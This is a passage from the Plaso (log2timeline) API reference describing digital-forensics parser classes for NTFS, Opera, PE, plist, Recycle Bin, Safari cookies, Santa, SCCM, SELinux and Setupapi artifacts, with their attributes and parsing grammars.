file_reference NTFS file reference. Type int file_system_type file system type. Type str filename name of the file. Type str is_allocated True if the MFT entry is allocated (marked as in use). Type bool name name associated with the stat event, for example that of a $FILE_NAME attribute or None if not available. Type str parent_file_reference NTFS file reference of the parent. Type int path_hints hints about the full path of the file. Type list[str] symbolic_link_target path of the symbolic link target. Type str DATA_TYPE = 'fs:stat:ntfs' class plaso.parsers.ntfs.NTFSMFTParser Bases: plaso.parsers.interface.FileObjectParser Parses a NTFS $MFT metadata file. DATA_FORMAT = 'NTFS $MFT metadata file' classmethod GetFormatSpecification() Retrieves the format specification. Returns format specification. Return type FormatSpecification NAME = 'mft' ParseFileObject(parser_mediator, file_object) Parses a NTFS $MFT metadata file-like object. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • file_object (dfvfs.FileIO) – file-like object.

5.1. Subpackages 405 Plaso (log2timeline), Release 20210606 class plaso.parsers.ntfs.NTFSUSNChangeEventData Bases: plaso.containers.events.EventData NTFS USN change event data. file_attribute_flags NTFS file attribute flags. Type int filename name of the file associated with the event. Type str file_reference NTFS file reference. Type int file_system_type file system type. Type str parent_file_reference NTFS file reference of the parent. Type int offset offset of the USN record relative to the start of the $J data stream, from which the event data wasextracted. Type int update_reason_flags update reason flags. Type int update_sequence_number update sequence number. Type int update_source_flags update source flags. Type int DATA_TYPE = 'fs:ntfs:usn_change' class plaso.parsers.ntfs.NTFSUsnJrnlParser Bases: plaso.parsers.interface.FileObjectParser, plaso.lib.dtfabric_helper. DtFabricHelper Parses a NTFS USN change journal. DATA_FORMAT = 'NTFS USN change journal ($UsnJrnl:$J) file system metadata file' NAME = 'usnjrnl' ParseFileObject(parser_mediator, file_object) Parses a NTFS $UsnJrnl metadata file-like object. Parameters

406 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

Parser for OLE Compound Files (OLECF). class plaso.parsers.olecf.OLECFParser Bases: plaso.parsers.interface.FileObjectParser Parses OLE Compound Files (OLECF). DATA_FILE = 'OLE Compound file (OLECF)' classmethod GetFormatSpecification() Retrieves the format specification. Returns format specification. Return type FormatSpecification NAME = 'olecf' ParseFileObject(parser_mediator, file_object) Parses an OLE Compound File (OLECF) file-like object. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • file_object (dfvfs.FileIO) – file-like object. plaso.parsers.opera module

Parsers for Opera Browser history files. class plaso.parsers.opera.OperaGlobalHistoryEventData Bases: plaso.containers.events.EventData Opera global history entry data. description description. Type str popularity_index popularity index. Type int title title. Type str url URL. Type str

5.1. Subpackages 407 Plaso (log2timeline), Release 20210606

DATA_TYPE = 'opera:history:entry' class plaso.parsers.opera.OperaGlobalHistoryParser Bases: plaso.parsers.interface.FileObjectParser Parses the Opera global_history.dat file. DATA_FORMAT = 'Opera global history (global_history.dat) file' NAME = 'opera_global' ParseFileObject(parser_mediator, file_object) Parses an Opera global history file-like object. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • file_object (dfvfs.FileIO) – file-like object. Raises UnableToParseFile – when the file cannot be parsed. class plaso.parsers.opera.OperaTypedHistoryEventData Bases: plaso.containers.events.EventData Opera typed history entry data. entry_selection information about whether the URL was directly typed in or the result of the user choosing from the auto complete. Type str entry_type information about whether the URL was directly typed in or the result of the user choosing from the auto complete. Type str url typed URL or hostname. Type str DATA_TYPE = 'opera:history:typed_entry' class plaso.parsers.opera.OperaTypedHistoryParser Bases: plaso.parsers.interface.FileObjectParser Parses the Opera typed_history.xml file. DATA_FORMAT = 'Opera typed history (typed_history.xml) file' NAME = 'opera_typed_history' ParseFileObject(parser_mediator, file_object) Parses an Opera typed history file-like object. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • file_object (dfvfs.FileIO) – file-like object. Raises UnableToParseFile – when the file cannot be parsed.

408 Chapter 5. plaso package Plaso (log2timeline), Release 20210606 plaso.parsers.pe module

A parser for Portable Executable format files. class plaso.parsers.pe.PEEventData Bases: plaso.containers.events.EventData Portable Executable (PE) event data. dll_name name of an imported DLL. Type str imphash “Import Hash” of the pe file the event relates to. Also see: https://www.mandiant.com/blog/ tracking-malware-import-hashing Type str pe_type type of PE file the event relates to. Type str section_names names of the PE file’s sections. Type list[str] DATA_TYPE = 'pe' class plaso.parsers.pe.PEParser Bases: plaso.parsers.interface.FileObjectParser Parser for Portable Executable (PE) files. DATA_FORMAT = 'Portable Executable (PE) file' classmethod GetFormatSpecification() Retrieves the format specification. NAME = 'pe' ParseFileObject(parser_mediator, file_object) Parses a Portable Executable (PE) file-like object. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • file_object (dfvfs.FileIO) – a file-like object. Raises UnableToParseFile – when the file cannot be parsed.

5.1. Subpackages 409 Plaso (log2timeline), Release 20210606

plaso.parsers.plist module

Parser for binary and text Property List (plist) files. class plaso.parsers.plist.PlistParser Bases: plaso.parsers.interface.FileObjectParser Parser for binary and text Property List (plist) files. DATA_FORMAT = 'Property list (plist) file' classmethod GetFormatSpecification() Retrieves the format specification. Returns a format specification or None if not available. Return type FormatSpecification NAME = 'plist' ParseFileObject(parser_mediator, file_object) Parses a plist file-like object. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • file_object (dfvfs.FileIO) – a file-like object. Raises UnableToParseFile – when the file cannot be parsed. plaso.parsers.pls_recall module

Parser for PL/SQL Developer Recall files. class plaso.parsers.pls_recall.PlsRecallEventData Bases: plaso.containers.events.EventData PL/SQL Recall event data. database_name name of the database. Type str offset offset of the PL/SQL Recall record relative to the start of the file, from which the event data wasextracted. Type int query PL/SQL query. Type str sequence_number sequence number. Type int username username used to query. Type str

410 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

DATA_TYPE = 'PLSRecall:event' class plaso.parsers.pls_recall.PlsRecallParser Bases: plaso.parsers.interface.FileObjectParser, plaso.lib.dtfabric_helper. DtFabricHelper Parse PL/SQL Recall files. This parser is based on the Delphi definition of the data type: TRecallRecord = packed record Sequence: Integer; TimeStamp: TDateTime; Username: array[0..30] of Char; Database: array[0..80] of Char; Text: array[0..4000] of Char; end; Delphi TDateTime is a little-endian 64-bit floating-point value without time zone information. DATA_FORMATE = 'PL SQL cache file (PL-SQL developer recall file)' NAME = 'pls_recall' ParseFileObject(parser_mediator, file_object) Parses a PLSRecall.dat file-like object. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • file_object (dfvfs.FileIO) – a file-like object. Raises UnableToParseFile – when the file cannot be parsed. plaso.parsers.plugins module

This file contains basic interface for plugins within Plaso. This library serves a basis for all plugins in Plaso, whether that are Windows Registry plugins, SQLite plugins or any other parsing plugins. This is provided as a separate file to make it easier to inherit in other projects that may want to use the Plasoplugin system. class plaso.parsers.plugins.BasePlugin Bases: object A plugin is a lightweight parser that makes use of a common data structure. When a data structure is common among several artifacts or files a plugin infrastructure can be written to make writing parsers simpler. The goal of a parser plugin is have only a single parser that understands the data structure that can call plugins that have specialized knowledge of certain structures. An example of this is a SQLite database. A plugin can be written that has knowledge of certain database, such as Chrome history, or Skype history, etc. This can be done without needing to write a full fledged parser that needs to re-implement the data structure knowledge. A single parser can be created that calls the plugins to see if it knows that particular database. Another example is Windows Registry, there a single parser that can parse the Registry can be made and the job of a single plugin is to parse a particular Registry key. The parser can then read a Registry key and compare it to a list of available plugins to see if it can be parsed. DATA_FORMAT = '' NAME = 'base_plugin'

5.1. Subpackages 411 Plaso (log2timeline), Release 20210606

Process(parser_mediator, **kwargs) Extracts events using a parser plugin. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfVFS. • kwargs (dict[str, object]) – Depending on the plugin they may require different sets of arguments to be able to evaluate whether or not this is the correct plugin. Raises ValueError – when there are unused keyword arguments. UpdateChainAndProcess(parser_mediator, **kwargs) Extracts events using a parser plugin and synchronizes the parser chain. This method updates the parser chain object held by the mediator, transfers control to the plugin-specific Process() method, and updates the chain again once the processing is complete. Parameters parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfVFS. class plaso.parsers.plugins.BasePluginCache Bases: object A generic cache for parser plugins. GetResults(attribute, default_value=None) Retrieves a cached attribute. Parameters • attribute (str) – name of the cached attribute. • default_value (Optional[object]) – default value. Returns value of the cached attribute or default value if the cache does not contain the attribute. Return type object plaso.parsers.popcontest module

This file contains the Popularity Contest log file parser inplaso. Information updated 20 january 2014. From Debian Package Popularity Contest Avery Pennarun From ‘https://www.unix.com/man-page/Linux/8/popularity-contest’: The popularity-contest command gathers information about Debian packages installed on the system, and prints the name of the most recently used executable program in that package as well as its last-accessed time (atime) and last-attribute-changed time (ctime) to stdout. When aggregated with the output of popularity-contest from many other systems, this information is valu- able because it can be used to determine which Debian packages are commonly installed, used, or installed and never used. This helps Debian maintainers make decisions such as which packages should be installed by default on new systems. The resulting statistic is available from the project home page https://popcon.debian.org

412 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

Normally, popularity-contest is run from a cron(8) job, /etc/cron.daily/popularity-contest, which automatically submits the results to Debian package maintainers (only once a week) according to the settings in /etc/popularity-contest.conf and /usr/share/popularity- contest/default.conf. From ‘https://popcon.ubuntu.com/README’: The popularity-contest output looks like this: POPULARITY-CONTEST-0 TIME:914183330 ID:b92a5fc1809d8a95a12eb3a3c8445 914183333 909868335 grep /bin/fgrep 914183333 909868280 findutils /usr/bin/find 914183330 909885698 dpkg-awk /usr/bin/dpkg-awk 914183330 909868577 gawk /usr/bin/gawk [...more lines...] END-POPULARITY-CONTEST-0 TIME:914183335 The first and last lines allow you to put more than one set of popularity-contest results intoa single file and then split them up easily later. The rest of the lines are package entries, one line for each package installed on your system. They have the format: is the name of the Debian package that contains . is the most recently used program, static library, or header (.h) file in the package. and are the access time and creation time of the on your disk, respectively, represented as the number of seconds since midnight GMT on January 1, 1970 (i.e. in Unix time_t format). Linux updates whenever you open the file; was set when you first installed the package. is determined by popularity-contest depending on , , and the current date. can be RECENT-CTIME, OLD, or NOFILES. RECENT-CTIME means that atime is very close to ctime; it’s impossible to tell whether the package was used recently or not, since is also updated when is set. Normally, this happens because you have recently upgraded the package to a new version, resetting the . OLD means that the is more than a month ago; you haven’t used the package for more than a month. NOFILES means that no files in the package seemed to be programs, so , , and are invalid.’ REMARKS. The parser will generate events solely based on the field and not using , to reduce the generation of (possibly many) useless events all with the same . Indeed, that will be probably get from file system and/or package management logs. The will be reported in the log line. class plaso.parsers.popcontest.PopularityContestEventData Bases: plaso.containers.events.EventData Popularity Contest event data. mru recently used app/library from package. Type str package installed packaged name, which the mru belongs to. Type str

5.1. Subpackages 413 Plaso (log2timeline), Release 20210606

record_tag popularity context tag. Type str DATA_TYPE = 'popularity_contest:log:event' class plaso.parsers.popcontest.PopularityContestParser Bases: plaso.parsers.text_parser.PyparsingSingleLineTextParser Parse popularity contest log files. DATA_FORMAT = 'Popularity Contest log file' FOOTER = {{{Suppress:("END-POPULARITY-CONTEST-") W:(0123...)} Suppress:("TIME:")} W:(0123...)} HEADER = {{{{{{Suppress:("POPULARITY-CONTEST-") W:(0123...)} Suppress:("TIME:")} W:(0123...)} Suppress:("ID:")} W:(ABCD...)} SkipTo:(LineEnd)} LINE_STRUCTURES = [('logline', {{W:(0123...) W:(0123...)} {{W:(0123...) quoted string, starting with < ending with >} | {{W:(0123...) W:(...)} [quoted string, starting with < ending with >]}}}), ('header', {{{{{{Suppress:("POPULARITY-CONTEST-") W:(0123...)} Suppress:("TIME:")} W:(0123...)} Suppress:("ID:")} W:(ABCD...)} SkipTo:(LineEnd)}), ('footer', {{{Suppress:("END-POPULARITY-CONTEST-") W:(0123...)} Suppress:("TIME:")} W:(0123...)})] LOG_LINE = {{W:(0123...) W:(0123...)} {{W:(0123...) quoted string, starting with < ending with >} | {{W:(0123...) W:(...)} [quoted string, starting with < ending with >]}}} MRU = W:(...) NAME = 'popularity_contest' PACKAGE = W:(0123...) ParseRecord(parser_mediator, key, structure) Parses a log record structure and produces events. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • key (str) – name of the parsed structure. • structure (pyparsing.ParseResults) – structure parsed from the log file. Raises ParseError – when the structure type is unknown. TAG = quoted string, starting with < ending with > VerifyStructure(parser_mediator, line) Verify that this file is a Popularity Contest log file. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • line (str) – line from a text file. Returns True if the line was successfully parsed.

414 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

Return type bool class plaso.parsers.popcontest.PopularityContestSessionEventData Bases: plaso.containers.events.EventData Popularity Contest session event data. details version and host architecture. Type str hostid host uuid. Type str session session number. Type int status session status, either “start” or “end”. Type str DATA_TYPE = 'popularity_contest:session:event' plaso.parsers.presets module

The parser and parser plugin presets. class plaso.parsers.presets.ParserPreset(name, parsers) Bases: object Parser and parser plugin preset. name name of the preset. Type str operating_systems operating system artifact attribute containers, that specify to which operating systems the preset applies. Type list[OperatingSystemArtifact] parsers names of parser and parser plugins. Type list[str] class plaso.parsers.presets.ParserPresetsManager Bases: object The parsers and plugin presets manager. GetNames() Retrieves the preset names. Returns preset names in alphabetical order. Return type list[str]

5.1. Subpackages 415 Plaso (log2timeline), Release 20210606

GetParsersByPreset(preset_name) Retrieves the parser and plugin names of a specific preset. Parameters preset_name (str) – name of the preset. Returns parser and plugin names in alphabetical order. Return type list[str] Raises KeyError – if the preset does not exist. GetPresetByName(name) Retrieves a specific preset definition by name. Parameters name (str) – name of the preset. Returns a parser preset or None if not available. Return type ParserPreset GetPresetsByOperatingSystem(operating_system) Retrieves preset definitions for a specific operating system. Parameters operating_system (OperatingSystemArtifact) – an operating system artifact attribute container. Returns preset definition that correspond with the operating system. Return type list[PresetDefinition] GetPresetsInformation() Retrieves the presets information. Returns containing: str: preset name. str: comma separated parser and plugin names that are defined by the preset. Return type list[tuple] ReadFromFile(path) Reads parser and parser plugin presets from a file. Parameters path (str) – path of file that contains the the parser and parser plugin presets configuration. Raises MalformedPresetError – if one or more plugin preset definitions are malformed. plaso.parsers.recycler module

Parser for Windows Recycle files, INFO2 and $I/$R pairs. class plaso.parsers.recycler.WinRecycleBinEventData Bases: plaso.containers.events.EventData Windows Recycle Bin event data. drive_number drive number. Type int

416 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

file_size file size. Type int offset offset of the Recycle Bin record relative to the start of the file, from which the event data wasextracted. Type int original_filename filename. Type str record_index index of the record, from which the event data was extracted. Type int short_filename short filename. Type str DATA_TYPE = 'windows:metadata:deleted_item' class plaso.parsers.recycler.WinRecycleBinParser Bases: plaso.parsers.interface.FileObjectParser, plaso.lib.dtfabric_helper. DtFabricHelper Parses the Windows $Recycle.Bin $I files. DATA_FORMAT = 'Windows $Recycle.Bin $I file' NAME = 'recycle_bin' ParseFileObject(parser_mediator, file_object) Parses a Windows Recycle.Bin metadata ($I) file-like object. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • file_object (dfvfs.FileIO) – file-like object. Raises UnableToParseFile – when the file cannot be parsed. class plaso.parsers.recycler.WinRecyclerInfo2Parser Bases: plaso.parsers.interface.FileObjectParser, plaso.lib.dtfabric_helper. DtFabricHelper Parses the Windows Recycler INFO2 file. DATA_FORMAT = 'Windows Recycler INFO2 file' NAME = 'recycle_bin_info2' ParseFileObject(parser_mediator, file_object) Parses a Windows Recycler INFO2 file-like object. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.

5.1. Subpackages 417 Plaso (log2timeline), Release 20210606

• file_object (dfvfs.FileIO) – file-like object. Raises UnableToParseFile – when the file cannot be parsed.

plaso.parsers.safari_cookies module

Parser for Safari Binary Cookie files. class plaso.parsers.safari_cookies.BinaryCookieParser Bases: plaso.parsers.interface.FileObjectParser, plaso.lib.dtfabric_helper. DtFabricHelper Parser for Safari Binary Cookie files. DATA_FORMAT = 'Safari Binary Cookie file' classmethod GetFormatSpecification() Retrieves the format specification for parser selection. Returns format specification. Return type FormatSpecification NAME = 'binary_cookies' ParseFileObject(parser_mediator, file_object) Parses a Safari binary cookie file-like object. Parameters • parser_mediator (ParserMediator) – parser mediator. • file_object (dfvfs.FileIO) – file-like object to be parsed. Raises • ParseError – when the page sizes array cannot be parsed. • UnableToParseFile – when the file cannot be parsed, this will signal the event extractor to apply other parsers. class plaso.parsers.safari_cookies.SafariBinaryCookieEventData Bases: plaso.containers.events.EventData Safari binary cookie event data. cookie_name cookie name. Type str cookie_value cookie value. Type str flags cookie flags. Type int path path of the cookie. Type str

418 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

url URL where this cookie is valid. Type str DATA_TYPE = 'safari:cookie:entry' plaso.parsers.santa module

Santa log (santa.log) parser. class plaso.parsers.santa.SantaExecutionEventData Bases: plaso.containers.events.EventData Santa execution event data. action action recorded by Santa. Type str decision if the process was allowed or blocked. Type str reason reason behind santa decision to execute or block a process. Type str process_hash SHA256 hash for the executed process. Type str certificate_hash SHA256 hash for the certificate associated with the executed process. Type str certificate_common_name certificate common name. Type str pid process id for the process. Type str ppid parent process id for the executed process. Type str uid user id associated with the executed process. Type str user user name associated with the executed process. Type str

5.1. Subpackages 419 Plaso (log2timeline), Release 20210606

gid group id associated with the executed process. Type str group group name associated with the executed process. Type str mode Santa execution mode, for example Monitor or Lockdown. Type str process_path process file path. Type str process_arguments executed process with its arguments. Type str DATA_TYPE = 'santa:execution' class plaso.parsers.santa.SantaFileSystemEventData Bases: plaso.containers.events.EventData Santa file system event data. action event type recorded by Santa. Type str file_path file path and name for WRITE/DELETE events. Type str file_new_path new file path and name for RENAME events. Type str pid process id for the process. Type str ppid parent process id for the executed process. Type str process process name. Type str process_path process file path. Type str

420 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

uid user id associated with the executed process. Type str user user name associated with the executed process. Type str gid group id associated with the executed process. Type str group group name associated with the executed process. Type str DATA_TYPE = 'santa:file_system_event' class plaso.parsers.santa.SantaMountEventData Bases: plaso.containers.events.EventData Santa mount event data. action event type recorded by Santa. Type str mount disk mount point. Type str volume disk volume name. Type str bsd_name disk BSD name. Type str fs disk volume kind. Type str model disk model. Type str serial disk serial. Type str bus device protocol. Type str

5.1. Subpackages 421 Plaso (log2timeline), Release 20210606

dmg_path DMG file path. Type str appearance disk appearance date. Type str DATA_TYPE = 'santa:diskmount' class plaso.parsers.santa.SantaParser Bases: plaso.parsers.text_parser.PyparsingSingleLineTextParser Parses santa log files DATA_FORMAT = 'Santa log (santa.log) file'

422 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

LINE_STRUCTURES = [('execution_line', {{{{{{{{{{{{{{{{{{{Combine:({{{{{{{{{{{{{{{Suppress:("[") W:(0123...)} "-"} W:(0123...)} "-"} W:(0123...)} "T"} W:(0123...)} ":"} W:(0123...)} ":"} W:(0123...)} "."} W:(0123...)} "Z"} Suppress:("]")}) Suppress:("I santad:")} Suppress:("action=")} "EXEC"} Suppress:("|")} {{Suppress:("decision=") SkipTo:("|")} Suppress:("|")}} {{Suppress:("reason=") SkipTo:("|")} Suppress:("|")}} {{Suppress:("sha256=") SkipTo:("|")} Suppress:("|")}} [{{Suppress:("cert_sha256=") SkipTo:("|")} Suppress:("|")}]} [{{Suppress:("cert_cn=") SkipTo:("|")} Suppress:("|")}]} [{{Suppress:("quarantine_url=") SkipTo:("|")} Suppress:("|")}]} {{Suppress:("pid=") SkipTo:("|")} Suppress:("|")}} {{Suppress:("ppid=") SkipTo:("|")} Suppress:("|")}} {{Suppress:("uid=") SkipTo:("|")} Suppress:("|")}} {{Suppress:("user=") SkipTo:("|")} Suppress:("|")}} {{Suppress:("gid=") SkipTo:("|")} Suppress:("|")}} {{Suppress:("group=") {SkipTo:("|") | SkipTo:(lineEnd)}} [Suppress:("|")]}} {{Suppress:("mode=") SkipTo:("|")} Suppress:("|")}} {{Suppress:("path=") {SkipTo:("|") | SkipTo:(lineEnd)}} [Suppress:("|")]}} [{Suppress:("args=") SkipTo:(lineEnd)}]}), ('file_system_event_line', {{{{{{{{{{{{{{Combine:({{{{{{{{{{{{{{{Suppress:("[") W:(0123...)} "-"} W:(0123...)} "-"} W:(0123...)} "T"} W:(0123...)} ":"} W:(0123...)} ":"} W:(0123...)} "."} W:(0123...)} "Z"} Suppress:("]")}) Suppress:("I santad:")} Suppress:("action=")} {{"WRITE" ^ "RENAME"} ^ "DELETE"}} Suppress:("|")} {{Suppress:("path=") {SkipTo:("|") | SkipTo:(lineEnd)}} [Suppress:("|")]}} [{{Suppress:("newpath=") SkipTo:("|")} Suppress:("|")}]} {{Suppress:("pid=") SkipTo:("|")} Suppress:("|")}} {{Suppress:("ppid=") SkipTo:("|")} Suppress:("|")}} {{Suppress:("process=") SkipTo:("|")} Suppress:("|")}} {{Suppress:("processpath=") SkipTo:("|")} Suppress:("|")}} {{Suppress:("uid=") SkipTo:("|")} Suppress:("|")}} {{Suppress:("user=") SkipTo:("|")} Suppress:("|")}} {{Suppress:("gid=") SkipTo:("|")} Suppress:("|")}} {{Suppress:("group=") {SkipTo:("|") | SkipTo:(lineEnd)}} [Suppress:("|")]}}), ('mount_line', {{{{{{{{{{{{{Combine:({{{{{{{{{{{{{{{Suppress:("[") W:(0123...)} "-"} W:(0123...)} "-"} W:(0123...)} "T"} W:(0123...)} ":"} W:(0123...)} ":"} W:(0123...)} "."} W:(0123...)} "Z"} Suppress:("]")}) Suppress:("I santad:")} Suppress:("action=")} "DISKAPPEAR"} Suppress:("|")} {{Suppress:("mount=") SkipTo:("|")} Suppress:("|")}} {{Suppress:("volume=") SkipTo:("|")} Suppress:("|")}} {{Suppress:("bsdname=") {SkipTo:("|") | SkipTo:(lineEnd)}} [Suppress:("|")]}} {{Suppress:("fs=") SkipTo:("|")} Suppress:("|")}} {{Suppress:("model=") SkipTo:("|")} Suppress:("|")}} {{Suppress:("serial=") SkipTo:("|")} Suppress:("|")}} {{Suppress:("bus=") SkipTo:("|")} Suppress:("|")}} {{Suppress:("dmgpath=") SkipTo:("|")} Suppress:("|")}} {Suppress:("appearance=") SkipTo:(lineEnd)}}), ('umount_line', {{{{{{{Combine:({{{{{{{{{{{{{{{Suppress:("[") W:(0123...)} "-"} W:(0123...)} "-"} W:(0123...)} "T"} W:(0123...)} ":"} W:(0123...)} ":"} W:(0123...)} "."} W:(0123...)} "Z"} Suppress:("]")}) Suppress:("I santad:")} Suppress:("action=")} "DISKDISAPPEAR"} Suppress:("|")} {{Suppress:("mount=") SkipTo:("|")} Suppress:("|")}} {{Suppress:("volume=") SkipTo:("|")} Suppress:("|")}} {{Suppress:("bsdname=") {SkipTo:("|") | SkipTo:(lineEnd)}} [Suppress:("|")]}}), ('quota_exceeded_line', {Combine:({{{{{{{{{{{{{{{Suppress:("[") W:(0123...)} "-"} W:(0123...)} "-"} W:(0123...)} "T"} W:(0123...)} ":"} W:(0123...)} ":"} W:(0123...)} "."} W:(0123...)} "Z"} Suppress:("]")}) "*** LOG MESSAGE QUOTA EXCEEDED - SOME MESSAGES FROM THIS PROCESS HAVE BEEN DISCARDED ***"})] MAX_LINE_LENGTH = 16384 NAME = 'santa' ParseRecord(parser_mediator, key, structure) Parses a matching entry.

5.1. Subpackages 423 Plaso (log2timeline), Release 20210606

Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • key (str) – name of the parsed structure. • structure (pyparsing.ParseResults) – elements parsed from the file. Raises ParseError – when the structure type is unknown. VerifyStructure(parser_mediator, line) Verifies that this is a santa log file. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • line (str) – line from the text file. Returns True if this is the correct parser, False otherwise. Return type bool plaso.parsers.sccm module

Parser for SCCM Logs. class plaso.parsers.sccm.SCCMLogEventData Bases: plaso.containers.events.EventData SCCM log event data. component component. Type str text text. Type str DATA_TYPE = 'software_management:sccm:log' class plaso.parsers.sccm.SCCMParser Bases: plaso.parsers.text_parser.PyparsingMultiLineTextParser Parser for Windows System Center Configuration Manager (SCCM) logs. BUFFER_SIZE = 16384 DATA_FORMAT = 'System Center Configuration Manager (SCCM) client log file' LINE_GRAMMAR_BASE = {{{{{{{{{{{{{{{{{"

424 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

LINE_GRAMMAR_OFFSET = {{{{{{{{{{{{{{{{{{"

5.1. Subpackages 425 Plaso (log2timeline), Release 20210606 plaso.parsers.selinux module

This file contains SELinux audit log (audit.log) file parser. Information updated 16 january 2013. An example: type=AVC msg=audit(1105758604.519:420): avc: denied { getattr } for pid=5962 comm=”httpd” path=”/home/auser/public_html” dev=sdb2 ino=921135 Where msg=audit(1105758604.519:420) contains the number of seconds since January 1, 1970 00:00:00 UTC and the number of milliseconds after the dot for example: “seconds: 1105758604, milliseconds: 519”. The number after the timestamp (420 in the example) is a ‘serial number’ that can be used to correlate multiple logs generated from the same event. class plaso.parsers.selinux.SELinuxLogEventData Bases: plaso.containers.events.EventData SELinux log event data. audit_type audit type. Type str body body of the log line. Type str pid process identifier (PID) that created the SELinux log line. Type int DATA_TYPE = 'selinux:line' class plaso.parsers.selinux.SELinuxParser Bases: plaso.parsers.text_parser.PyparsingSingleLineTextParser Parser for SELinux audit log (audit.log) files. DATA_FORMAT = 'SELinux audit log (audit.log) file' LINE_STRUCTURES = [('line', Dict:({{Group:({{"type" Suppress:("=")} {W:(ABCD...) ^ Re:('UNKNOWN\\[[0-9]+\\]')}}) Group:({{{{{{{"msg" Suppress:("=audit(")} W:(0123...)} Suppress:(".")} W:(0123...)} Suppress:(":")} W:(0123...)} Suppress:("):")})} Group:({Empty rest of line})}))] NAME = 'selinux' ParseRecord(parser_mediator, key, structure) Parses a structure of tokens derived from a line of a text file. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • key (str) – name of the parsed structure. • structure (pyparsing.ParseResults) – structure of tokens derived from a line of a text file.

426 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

Raises ParseError – when the structure type is unknown. VerifyStructure(parser_mediator, line) Verifies if a line from a text file is in the expected format. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • line (str) – line from a text file. Returns True if the line is in the expected format, False if not. Return type bool plaso.parsers.setupapi module

Parser for Windows Setupapi log files. The format is documented at: https://docs.microsoft.com/en-us/windows-hardware/drivers/install/setupapi-text-logs class plaso.parsers.setupapi.SetupapiLogEventData Bases: plaso.containers.events.EventData Setupapi log event data. entry_type log entry type, for examaple “Device Install - PCIVEN_104C&DEV_8019&SUBSYS_8010104C&REV_003&61aaa01&0&38” or “Sysprep Respecialize - {804b345a-ffd7-854c-a1b5-ca9598907846}”. Type str exit_status the exit status of the logged operation. Type str DATA_TYPE = 'setupapi:log:line' class plaso.parsers.setupapi.SetupapiLogParser Bases: plaso.parsers.text_parser.PyparsingSingleLineTextParser Parses events from Windows Setupapi log files. DATA_FORMAT = 'Windows SetupAPI log file'

5.1. Subpackages 427 Plaso (log2timeline), Release 20210606

LINE_STRUCTURES = [('ignorable_line', {{"[Boot Session:" Group:({{{{{{{{{{{W:(0123...) Suppress:("/")} W:(0123...)} Suppress:("/")} W:(0123...)} W:(0123...)} Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)} Suppress:(W:(.,))} W:(0123...)})} "]"}), ('ignorable_line', {"[BeginLog]" lineEnd}), ('ignorable_line', {"[Device Install Log]" lineEnd}), ('ignorable_line', {{stringStart {" . " | "!!! " | "! " | " "}} rest of line}), ('ignorable_line', {{stringStart {"!!! " | "! " | " "}} rest of line}), ('section_end', {{Suppress:("<<< Section end ") Group:({{{{{{{{{{{W:(0123...) Suppress:("/")} W:(0123...)} Suppress:("/")} W:(0123...)} W:(0123...)} Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)} Suppress:(W:(.,))} W:(0123...)})} lineEnd}), ('section_end_exit_status', {{{Suppress:("<<< [Exit status: ") !W:(])} "]"} lineEnd}), ('section_header', {{{Suppress:(">>> [") !W:(])} "]"} lineEnd}), ('section_start', {{Suppress:(">>> Section start") Group:({{{{{{{{{{{W:(0123...) Suppress:("/")} W:(0123...)} Suppress:("/")} W:(0123...)} W:(0123...)} Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)} Suppress:(W:(.,))} W:(0123...)})} lineEnd})] NAME = 'setupapi' ParseRecord(parser_mediator, key, structure) Parses a log record structure and produces events. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • key (str) – identifier of the structure of tokens. • structure (pyparsing.ParseResults) – structure of tokens derived from a log entry. Raises ParseError – when the structure type is unknown. VerifyStructure(parser_mediator, line) Verify that this file is a Windows Setupapi log file. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • line (str) – single line from the text file. Returns True if this is the correct parser, False otherwise. Return type bool plaso.parsers.skydrivelog module

This file contains SkyDrive log file parser in plaso. class plaso.parsers.skydrivelog.SkyDriveLogEventData Bases: plaso.containers.events.EventData SkyDrive log event data. detail details. Type str

428 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

